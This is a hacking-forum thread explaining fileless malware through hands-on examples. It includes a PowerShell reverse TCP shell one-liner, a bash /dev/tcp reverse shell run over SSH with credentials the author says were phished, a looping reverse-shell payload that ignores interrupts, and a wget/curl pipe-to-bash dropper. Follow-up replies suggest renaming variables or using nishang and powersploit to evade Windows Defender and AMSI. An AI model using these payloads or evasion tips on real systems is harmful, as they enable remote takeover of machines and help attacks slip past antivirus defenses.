Fileless Malware
#1
Fileless Malware
 Fileless malware is a simple yet dangerous threat. It renders some network defenses ineffective. But what is fileless malware? The dictionary definition (simplified) is that it's malicious code that exists only in memory. For our non-technical readers that means that the code isn't ever a .exe that you execute or anything like that. But the dictionary definition is boring and not really accurate anyway. My definition is "malicious code that primarily operates in RAM." Note the keyword "primarily" in there. Not all fileless malware is 100% fileless. But let's stop flipping through the dictionary and look at some examples. I'm more the type to teach by examples and analogies after all.
 
 I'll start by giving you an example of some fileless malware (don't worry it's not going to hurt you).
Code:
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
 
 This powershell command is a reverse TCP shell. It is technically a fileless malware sample. It is executed straight from the command line or via an exploit. There are other ways to run code of course, but those are some common ones for this particular sample. This little powershell one liner is nice for a few reasons. Antivirus products don't have a chance to scan a file for malicious code, because there is no file to be scanned. In addition to that very convenient feature is the fact that this is incredibly easy to modify. That's one of the good things about scripting languages like powershell, python, etc. They are easy to modify, obfuscate, and add features to. Next we get into the nitty gritty details of how an attack utilizing fileless malware would look.
 
[Image: fileless-attack-kill-chain.png]
 
 The illustration above is an excellent example of a fileless malware attack, courtesy of our friends at McAfee. The limit to fileless attacks is your imagination though. Don't get caught up in the examples. Let's create our very own fileless malware attack. Put on your APT hats. We're going to be operating on Linux since that's my main system's OS and Linux provides an abundance of tools for fileless attacks. We're going to be doing our delivery through the amazing SSH protocol. Let's say we phished some SSH credentials from a naive user. Set up a netcat listener on your system with the following command.
Code:
$ ncat -lkv 31337
 
Use whatever port you want of course. Now on our "victim machine" we will execute a reverse shell. Simple I know, but we're starting bare-bones and building up. To execute the reverse shell, enter the following (also on your system):
Code:
ssh user@compromised.host "bash -i >& /dev/tcp/<yourIP>/<yourPort> 0>&1"
 
 Reverse shell back to you. Not very interesting, but effective and also fileless. We haven't touched the target system disk. Let's whip up a little shell script and make this more interesting. The script below is our main payload. Every 30 seconds it connects back and gives us a shell. It also ignores the SIGINT signal. So if you press Ctrl + c by accident you don't kill it.
 
Code:
#!/bin/bash
trap ":" SIGINT SIGHUP
while True; do
    bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
    sleep 30
done
 
But rather than executing this directly, we'll use this one liner:
Code:
whereis wget && (wget -O - http://localhost:8888/test.sh | bash &) || whereis curl && (curl -o - http://localhost:8888/test.sh | bash &)
 
So to drop the payload we simply execute the one liner via SSH. 
Code:
ssh user@compromised.system "whereis wget && (wget -O - http://localhost:8888/test.sh | bash &) || whereis curl && (curl -o - http://localhost:8888/test.sh | bash &)"
 
 This attack is simple enough. But it never touched the disk. The SSH command just downloaded and ran the code. Of course as with any attack of this nature, if the system you're attacking gets turned off then you're screwed. And a persistence mechanism will make the fileless attack less fileless in all likelihood. Powershell, WMI, Mshta.exe, and other Windows tools are also used in fileless malware attacks.
 
 If you want to learn more about fileless malware attacks I highly recommend reading this post from Cybereason: Cybereason: Fileless Malware. A specific example of an advanced fileless malware attack is Operation Cobalt Kitty: Operation Cobalt Kitty. I haven't fully looked into it. An APT compromised a corporate network and remained there for an entire year, which is pretty impressive. Even more interesting though, is that they used publicly available tools that you may be familiar with to carry out the attack. They used payloads from Cobalt strike, nishang, and powersploit. So for those of you who think that all this is just a game, some of the most advanced APTs use the same tools as you. I hope you enjoyed reading about this. If you have any questions, comments or smart remarks just post below.
Reply
#2
Very interesting thread Dismal.

I've heard of fileless malware before but I could never wrap my head around this concept. But you've explained it very well here. What I wonder sometimes is; How does one achieve persistence using filelessmalware? But I suppose it's like you say, adding persistence will make it less fileless... This is a good way to attack high value targets like APTs do; rather than blindly infecting home users with botnets and ransomware.

I do have a question about one if the payloads here though. Its been a while since I've used linux as my home environment so...
Code:
wget -O - http://localhost:8888/test.sh | bash &

Using wget here, wouldn't wget download this bash script directly to the disk somewhere? Or will the pipeline to bash only download it to memory?
Reply
#3
(05-16-2020, 10:38 PM)Insider Wrote: Very interesting thread Dismal.

I've heard of fileless malware before but I could never wrap my head around this concept. But you've explained it very well here. What I wonder sometimes is; How does one achieve persistence using filelessmalware? But I suppose it's like you say, adding persistence will make it less fileless... This is a good way to attack high value targets like APTs do; rather than blindly infecting home users with botnets and ransomware.

I do have a question about one if the payloads here though. Its been a while since I've used linux as my home environment so...
Code:
wget -O - http://localhost:8888/test.sh | bash &

Using wget here, wouldn't wget download this bash script directly to the disk somewhere? Or will the pipeline to bash only download it to memory?
 
The -O - means pipe output to stdout. So it goes straight to bash and doesn't touch the disk. Curl can do the same with "-o -". Good question though. And yes, once you introduce persistence it's very difficult to stay fileless. I'm not going to say impossible, but I have no idea how you do it. Every fileless malware sample I've heard of writes to disk in some form for persistence.
Reply
#4
Darn powershell doesn't like my code Smile
[Image: m2YEcPY.png]

Tried base64 too.
[Image: XQmfP8P.png]
Reply
#5
(05-17-2020, 05:59 PM)Insider Wrote: Darn powershell doesn't like my code Smile
[Image: m2YEcPY.png]

Tried base64 too.
[Image: XQmfP8P.png]
 
I couldn't see the picture that well. But if that's the one liner from the post, I don't really have any idea if it works.
Reply
#6
(05-17-2020, 08:40 PM)Dismal_0x8 Wrote: I couldn't see the picture that well. But if that's the one liner from the post, I don't really have any idea if it works.

It's the onliner from the thread. But after some research I believe we need to bypass "AMSI" first.
https://0x00-0x00.github.io/research/201...-code.html
Reply
#7
(05-17-2020, 08:47 PM)Insider Wrote:
(05-17-2020, 08:40 PM)Dismal_0x8 Wrote: I couldn't see the picture that well. But if that's the one liner from the post, I don't really have any idea if it works.

It's the onliner from the thread. But after some research I believe we need to bypass "AMSI" first.
https://0x00-0x00.github.io/research/201...-code.html
 
I just saw what the error actually said haha. Yeah that's windows defender I'm fairly sure. It probably just detected some part of the command. Just try changing variable names. Or you could always just go check out nishang and/or powersploit. They have some good payloads and AV bypass functions.
Reply